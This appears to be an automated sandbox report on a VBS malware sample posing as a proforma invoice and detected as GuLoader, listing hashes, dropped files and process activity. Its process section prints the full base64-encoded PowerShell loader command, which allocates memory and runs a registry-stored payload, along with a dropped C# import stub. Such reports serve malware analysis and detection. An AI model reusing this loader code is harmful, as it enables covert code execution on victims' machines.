C:\Users\user\AppData\Local\...\b0raocps.dll, PE32 14->21 dropped 19 cvtres.exe 1 14->19         started        process9

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Unclear Proforma Invoice.vbs5%VirustotalBrowse
    Unclear Proforma Invoice.vbs10%ReversingLabsScript-WScript.Downloader.Heuristic
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    NameSourceMaliciousAntivirus DetectionReputation
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.794035353.0000000005121000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      IP
      192.168.2.1
      Joe Sandbox Version:35.0.0 Citrine
      Analysis ID:680487
      Start date and time: 08/08/202217:28:372022-08-08 17:28:37 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 9m 25s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Unclear Proforma Invoice.vbs
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:33
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal80.troj.evad.winVBS@8/8@0/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 36
      • Number of non-executed functions: 3
      Cookbook Comments:
      • Found application associated with file extension: .vbs
      • Adjust boot time
      • Enable AMSI
      • Override analysis time to 240s for JS/VBS files not yet terminated
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
      • Excluded IPs from analysis (whitelisted): 23.211.6.115
      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      TimeTypeDescription
      17:30:52API Interceptor25x Sleep call for process: powershell.exe modified
      No context
      No context
      No context
      No context
      No context
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
      Category:dropped
      Size (bytes):1328
      Entropy (8bit):3.9750279063524903
      Encrypted:false
      SSDEEP:24:Hye9E2gwO0XhHmFhKE2mfII+ycuZhNiakSKPNnq9qd:ewO0x6K1mg1ulia3mq9K
      MD5:AB0B62A075E1E7802BAB54195D29392F
      SHA1:596535B8F8FBC5B787380646B77FC4362D45F6A3
      SHA-256:EE4091D05BF2033A4CEE3CF609B23CFFBC7AB50065CE1DE7EE71526CAAB94F02
      SHA-512:EBD33B4B6CC167831BE00BCDE1B419B89E0B169FF554B11266E3548E7ED1B3F4751C91221DB7772FB83D12CECF7784550952BD967B90EC7C7DC0D7D2EAB4E12D
      Malicious:false
      Reputation:low
      Preview:L.....b.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\b0raocps\CSC533D9109F058485082AFE99DFE1364C9.TMP.................7w....f...P............4.......C:\Users\user\AppData\Local\Temp\RESED66.tmp.-.<...................'...Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.0.r.a.o.c.p.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Reputation:high, very likely benign file
      Preview:1
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Reputation:high, very likely benign file
      Preview:1
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:MSVC .res
      Category:dropped
      Size (bytes):652
      Entropy (8bit):3.0725923609871137
      Encrypted:false
      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryexak7YnqqT2PN5Dlq5J:+RI+ycuZhNiakSKPNnqX
      MD5:AEBF3777C39FB91FAE66A4A5CD509BDA
      SHA1:63C4B200ED4B2421B4DE7C80ACACB23E2822DD3C
      SHA-256:9C071110799C00220A1789B61BAA0A5D98203D7E867F1389CFE0BD1D3D98A1C9
      SHA-512:8D5DE0D08BEE287B8E2E61F9425F92FD5932797224B861A93FF7EE22DAC8EEE78D917A8F348781C1775D13083C0A616EFB02BDFD2AA5C92841F1D30707279AEE
      Malicious:false
      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.0.r.a.o.c.p.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.0.r.a.o.c.p.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):618
      Entropy (8bit):5.034501985170115
      Encrypted:false
      SSDEEP:6:V/DsDrSvS/V4SRHJGrfYkYy4YZ4SRBHACoQfYkYy4Ym2LGLohiIDSRbRumJwVYbb:V/DGrFNHaLZtUgf6qSN7Jwb5Fa
      MD5:5D11B747370938A6D5F8FAB59464F433
      SHA1:8AA9E3B0291692E502680CB3BB4F4D8DE7A526C5
      SHA-256:011A2549ACEB2D12BEE5D95DF0BE9D362867480B5ECD3FC1E005A29A1B8D95C8
      SHA-512:416CC345236EC8101E56A4EE252D55FDF2570DD3E82FAE815680406E1480414211FEA1EDA69E818D341B4013D796B08A2E0A72A579FADF453063D831AD951BCC
      Malicious:false
      Preview:.using System;..using System.Runtime.InteropServices;..public static class Skyd1..{..[DllImport("kernel32.dll")]public static extern IntPtr EnumTimeFormatsA(uint Derivativt5,int Derivativt6, int Derivativt7);....[DllImport("kernel32.dll")]public static extern IntPtr CreatePipe(uint Derivativt5,int Derivativt6, int Derivativt7);....[DllImport("ntdll.dll", EntryPoint="ZwAllocateVirtualMemory")]public static extern int Fida(int Skyd6,ref Int32 lndgh,int Derivativt,ref Int32 Skyd,int Rgende142,int Skyd7);....[DllImport("kernel32.dll")]public static extern IntPtr GetFileTime(uint Derivativt5,int Derivativt6);....}
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
      Category:dropped
      Size (bytes):369
      Entropy (8bit):5.197781260227577
      Encrypted:false
      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23flLBn0zxs7+AEszIWXp+N23flLDH:p37Lvkmb6KH91n0WZE89P
      MD5:55056F9752B910CDAF24947B5080F4B6
      SHA1:F845CD2D1EDEFE23A94A421EDC92E6AD50DF5E8F
      SHA-256:9971171E29F064ED7E9E2827A9437C4317A8D38758409BDF0FF033DB565881AA
      SHA-512:0F22F66C588355193CD5CFA792C67842F5579545DE3BA4EEFCF72C857644CA15581B58CA51055DE9E6D24799064B2CD5AA817A214A52E316ECF83B6E462C2452
      Malicious:false
      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\b0raocps\b0raocps.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\b0raocps\b0raocps.0.cs"
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
      Category:dropped
      Size (bytes):3584
      Entropy (8bit):2.7714551740410895
      Encrypted:false
      SSDEEP:24:etGS4sh264fn8W0NYYeuEcda50f8PytkF5Au2t1yWI+ycuZhNiakSKPNnq:6db4kW06cdA0fO1F+fx1ulia3mq
      MD5:8427EF013A99D18A0DE9B50EC7152EC8
      SHA1:B1E630E12ED608273209081FFEA77371EEACDE00
      SHA-256:D9ED4B705C942261A160157D15E25E1795BCF7C58AB4E6C65DD22FEBBBBFAEEC
      SHA-512:B305BBEB426A7A0F4204983CD0F68868E03769E4A448F865453F97DBAB6018BFCA596BC18D79451D6FFD54DCA5F4A41E218213AB71710C6D73369F321C97F73B
      Malicious:false
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!................~$... ...@....... ....................................@.................................,$..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`$......H.......P ..............................................................BSJB............v4.0.30319......l...|...#~..........#Strings....h.......#US.p.......#GUID.......\...#Blob...........G.........%3............................................................-.&...............=...................................... 4............ E............ P............ U.........a.....m.....y.....a.....m.....y.........................................a.....m.....#.....(.!...,.....1.....:.
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
      Category:modified
      Size (bytes):867
      Entropy (8bit):5.293783636848799
      Encrypted:false
      SSDEEP:24:KBqd3ka6KHJE8QKaM5DqBVKVrdFAMBJTH:Uika6AJE8QKxDcVKdBJj
      MD5:6F4943A33FA0FA7B9E6478B0F8821CE5
      SHA1:981B908B98A01FBF08F72597E9402D819C85EC72
      SHA-256:AE17AB92CC1A3F3C2F0CF568927A9D571514F0BAC1B71C9DFFDB6CFBDCFDE222
      SHA-512:0722E35E9A9B0F5DE407F715C45F2377D1E96BB273748E621F5073234EA31EC499B0B1049AC56BCF21C8F7687004C870A98678DA09332E9A55BB3A141C97261D
      Malicious:false
      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\b0raocps\b0raocps.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\b0raocps\b0raocps.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
      File type:ASCII text, with CRLF line terminators
      Entropy (8bit):5.691634819052103
      TrID:
      • Visual Basic Script (13500/0) 100.00%
      File name:Unclear Proforma Invoice.vbs
      File size:223135
      MD5:2ccae65c60d12ce9d0d097db0d58cefa
      SHA1:4114f1b5a7c5ded759ca00fcbb10acfb4c72085f
      SHA256:d85deda96531cdada16f3d37ee1ad279289c60509f37b28e0d0dac0bd7e4c4ed
      SHA512:b506d03f3d224f115dda7ab6bba4f10a3339c89df8c9b9f22f4df4ad5f77605db05058328b7fe3ac3c71dd8966c9e98ba5c3fca9d149470c5c92ee94c07e924a
      SSDEEP:3072:BpLWvcTxLVb6TbVIcmPrYxynv+gg4mtcDIdXqTzjOyrqndFzwZ7B:jLKcSl/bU2ghmLilWlwZ9
      TLSH:4C2471615FB631FD2C1DF10B6F444C3FEAAE34CE149AB464A8E7064F4E0566A52EAD30
      File Content Preview:Function AGRONOMICAL(inclinableenslumbe)..If inclinableenslumbe = RTrim("Calciums182") Then ....Randomize....End If..End Function ..Sub Dekompositionernes47(Isolomagalleymandrilbor35)....Dim Unctoriumdelggel114..Unctoriumdelggel114 = Unctoriumdelggel114 &
      Icon Hash:e8d69ece869a9ec4
      No network behavior found

      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:17:29:44
      Start date:08/08/2022
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Unclear Proforma Invoice.vbs"
      Imagebase:0x7ff617a90000
      File size:163840 bytes
      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:4
      Start time:17:29:59
      Start date:08/08/2022
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGUAbABzACAAUABhAHIAYQBwAHMAeQBrACAAQQBuAHQAaQBoACAARAB1AGQAZQBsAHMAYQBjACAAZABlAHMAdQBsACAATQB1AHIAcABoAGkAZQBkACAATQBsAGQAcgAgAEwAbwB1AHQAaABlACAAQQBjAGMAdQBtAGIAZQBuAHQAawAgAFAAZQBjAHQAbwByAGEAbABpAHMAIABEAHUAdgBlAHQAIABPAHAAcwBwAHIAdABuACAAbgBlAGQAZABpAGUAcwAgAFUAZABzAHYAaQBuAGcAIABBAG4AYQBsAHkAcwBlAGEAIABGAGEAcgBlAHMAZwBsAG8AIABEAGUAbQBhAHIAIABCAGwAdQBlAGIAZQBsACAAQwBvAHUAcgBpAGQAYQBoACAAbwBmAGYAbABpAGMAIAANAAoAIwBSAHUAbABsAGUAcwB0ACAATABhAGMAaAByAHkAbQBhAHQAIABCAGEAcgB5AHQAaAB5AG0AIABNAGEAcgBpAHMAIAB0AG8AbABzAGUAeQBrAHUAbAAgAFUAdQBkAHMAbAB1AGsAawBlACAAUwBhAHQAcwBiAGkAbABsAGUAIABBAGwAdgBpAGQAZQBuAGQAIABVAGQAZwBhAG4AZwBzAGYAbwByACAAVgBlAGQAZwBhACAARgBlAHIAaQBlAGwAdQBrAG4AIABSAGUAeQBrACAAQwBoAGEAcwBzAGUAcgAgAEUAcQB1AGEAbABsAGkAIABGAG8AcgBzAHQAZQBuACAAbQB1AHMAawBpACAAVQBuAHAAZQBlAGwAIABTAHAAZQBrAHQAYQAgAEoAdQBuAGcAbQBhAG4AZAB1AG4AIABpAG4AZAB1AGsAdAAgAEkAcwBvAGwAIABTAGsAZQBsAG4AZQBtAHIAawAgAEQAZwBuAGYAbAAgAEYAbwBsAGsAZQByAGUAIABBAGYAcABhAHMAbgAgAEQAYQBsAGwAeQAgAEwAYQBuAGQAZwBhAG4AZwBzACAASABlAG4AcgBpAGsAcwBlAG4AIABNAG8AbABiAG8AaABpAHMAIABTAGEAbgBlAHIAaQBuAGcAIABHAHIAdQB0AG4AIABTAHQAYQBrAGwAYQBkAGUAcgBuACAAQQByAGMAaAAgAA0ACgAkAEMAMwAyACAAPQAgAFsAYwBoAGEAcgBdADMANAAgACsAIAAiAFoAIgAgACsAIAAiAHcAQQAiACsAIgBsAGwAIgArACIAbwBjACIAKwAiAGEAdABlAFYAaQByACIAKwAiAHQAdQBhAGwATQAiACsAIgBlACIAKwAiAG0AIgArACIAbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKACMAQwBvAG0AbQBhAG4AZABpAG4AZwAgAHUAbgBkAGUAcgBiAGUAIABBAHAAbwByAHIAIABVAG4AZgB1AHQAaQBsACAASgB1AGwAaQBhAG4AaQBzAHQAYgAgAEIAYQBnAGsAbABkAG4AaQBuAGcAIABTAGUAcgBlAG4AIABDAG8AbgB2ACAATwBzAHQAZQBvAHAAbABhACAAVQBuAHAAcgBlAGYAZQByAGEAIABTAGEAbQBtAGUAIABTAGUAbQBpAHMAcABpAHIAYQAgAFIAZQBnAGUAbgBzAGkAYQBuAGUAIABGAGUAaABzAG8AIABTAGsAbwB2ACAASwBvAG0AcABsAGUAdAB0AGUAIABSAGUAZABzAGUAIABEAGkAcwBwAHUAdABkAGEAZwAgAEYAYQB1AGMAIABTAGUAbQBpACAAZwBhAGwAYQBjAHQAIABOAG8AcgBvAHAAaQBhAG4AaQBjACAATQBpAGwAbABpAHMAZQBrAHUAbgAgAEIAZQBnAHIAZQBiAHMAZAAgAEsAZABmAGEAcgAgAE0AaQBzAG8AZwB5ACAAVABvAHAAZgBvAHIAcwBwACAAQwBwAHIAZgAgAGwAaQB2AHMAYgBlAHQAaQAgAE8AcgBkAHIAZQAgAE0AbABkAGUAaQBuAG8AZABvACAARQBrAHMAYQBtAGUAbgAgAFUAZABkAGEAbgBuAGUAbABzAGUAIAANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGsAeQBkADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBUAGkAbQBlAEYAbwByAG0AYQB0AHMAQQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgAsACAAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADcAKQA7AA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBQAGkAcABlACgAdQBpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANQAsAGkAbgB0ACAARABlAHIAaQB2AGEAdABpAHYAdAA2ACwAIABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANwApADsADQAKAA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACwAIABFAG4AdAByAHkAUABvAGkAbgB0AD0AJABDADMAMgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABGAGkAZABhACgAaQBuAHQAIABTAGsAeQBkADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAGwAbgBkAGcAaAAsAGkAbgB0ACAARABlAHIAaQB2AGEAdABpAHYAdAAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBrAHkAZAAsAGkAbgB0ACAAUgBnAGUAbgBkAGUAMQA0ADIALABpAG4AdAAgAFMAawB5AGQANwApADsADQAKAA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AEYAaQBsAGUAVABpAG0AZQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgApADsADQAKAA0ACgB9AA0ACgAiAEAADQAKACMAYgBvAHIAdABzACAARgB5AGcAZQBoAGUAbgB0ACAATwBzAHQAaQBuAGQAaQBlAGYAYQAgAEQAZQBuAHMAaQBmAGkAYwBhAHQAIABFAHgAYwBlAGwAIAB1AGQAZQBuAHIAaQBnAHMAbQAgAHYAYQBzAGkAYwBlAG4AdAByAGkAIABXAGkAbgBlAHMAawBpAG4AYQB2ACAAUwBrAGkAYgBzAGwAYQBkAG4AaQAgAFkAZABlAGwAcwBlAHMAbgBpAHYAIAANAAoAJABTAGsAeQBkADMAPQAwADsADQAKACQAUwBrAHkAZAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAawB5AGQAOAA9AFsAUwBrAHkAZAAxAF0AOgA6AEYAaQBkAGEAKAAtADEALABbAHIAZQBmAF0AJABTAGsAeQBkADMALAAwACwAWwByAGUAZgBdACQAUwBrAHkAZAA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACQAYgBhAHIAbwB1AGMAaABlAHQAdAA9ACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwB0AGgAYQBtAG0AZQAiACkALgBTAGsAbwB2AG0ADQAKACQARABlAHIAaQB2AGEAdABpAHYAdAAwACAAPQAgACcAJABEAGoAdgBsAGUAdQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAJwArACcAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQByAG8AdQBjAGgAZQB0AHQAKQAnAA0ACgAmACAAKAAgAFsAYwBoAGEAcgBdADEAMAA1ACsAJwBFACcAKwAnAFgAJwApACAAJABEAGUAcgBpAHYAYQB0AGkAdgB0ADAADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAEQAagB2AGwAZQB1AGQALAAgADAALAAgACAAJABTAGsAeQBkADMALAAgACQARABqAHYAbABlAHUAZAAuAGMAbwB1AG4AdAApADsADQAKAFsAUwBrAHkAZAAxAF0AOgA6AEUAbgB1AG0AVABpAG0AZQBGAG8AcgBtAGEAdABzAEEAKAAkAFMAawB5AGQAMwAsACAAMAAsACAAMAApAA0ACgANAAoADQAKAA0ACgA=
      Imagebase:0x1d0000
      File size:430592 bytes
      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.825442498.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
      Reputation:high

      Target ID:5
      Start time:17:30:00
      Start date:08/08/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7c9170000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:20
      Start time:17:31:05
      Start date:08/08/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0raocps\b0raocps.cmdline
      Imagebase:0x340000
      File size:2170976 bytes
      MD5 hash:350C52F71BDED7B99668585C15D70EEA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Reputation:moderate

      Target ID:21
      Start time:17:31:07
      Start date:08/08/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED66.tmp" "c:\Users\user\AppData\Local\Temp\b0raocps\CSC533D9109F058485082AFE99DFE1364C9.TMP"
      Imagebase:0xa0000
      File size:43176 bytes
      MD5 hash:C09985AE74F0882F208D75DE27770DFA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Reset < >

        Execution Graph

        Execution Coverage:8.1%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:0%
        Total number of Nodes:55
        Total number of Limit Nodes:1
        execution_graph 28180 4d3c9c0 28181 4d3c9e8 28180->28181 28186 4d35520 28181->28186 28188 4d35950 GetFileAttributesW 28186->28188 28187 4d35528 28189 4d35950 28187->28189 28188->28187 28191 4d35972 28189->28191 28190 4d35bd8 28191->28190 28194 4d36181 28191->28194 28199 4d36198 28191->28199 28196 4d3618e 28194->28196 28195 4d361bb 28195->28190 28196->28195 28204 4d3565c 28196->28204 28201 4d361a6 28199->28201 28200 4d361bb 28200->28190 28201->28200 28202 4d3565c GetFileAttributesW 28201->28202 28203 4d3627e 28202->28203 28203->28190 28205 4d36668 GetFileAttributesW 28204->28205 28207 4d3627e 28205->28207 28207->28190 28164 7efdbc6 28165 7efdbcc 28164->28165 28168 7eff380 28165->28168 28166 7efdbde 28169 7eff38f 28168->28169 28172 7eff3d1 28169->28172 28170 7eff3ad 28170->28166 28173 7eff40a 28172->28173 28175 7eff447 28173->28175 28176 7efb3bc 28173->28176 28175->28170 28177 7efe400 RtlEncodePointer 28176->28177 28179 7efe46e 28177->28179 28179->28175 28208 4d32188 28209 4d3219a 28208->28209 28212 4d34268 28209->28212 28210 4d321c9 28213 4d34276 28212->28213 28214 4d34230 28212->28214 28215 4d342a7 28213->28215 28218 4d34321 28213->28218 28222 4d34330 28213->28222 28214->28210 28215->28210 28219 4d34361 28218->28219 28220 4d3432a 28218->28220 28219->28215 28226 4d34398 28220->28226 28223 4d34343 28222->28223 28225 4d34398 GetFileAttributesW 28223->28225 28224 4d34361 28224->28215 28225->28224 28228 4d343bd 28226->28228 28227 4d344c3 28227->28219 28228->28227 28229 4d34482 28228->28229 28231 4d35950 GetFileAttributesW 28228->28231 28233 4d35de8 28228->28233 28229->28227 28230 4d35de8 GetFileAttributesW 28229->28230 28230->28227 28231->28229 28235 4d36181 GetFileAttributesW 28233->28235 28236 4d36198 GetFileAttributesW 28233->28236 28234 4d35e12 28234->28229 28235->28234 28236->28234

        Control-flow Graph

        • Executed
        • Not Executed
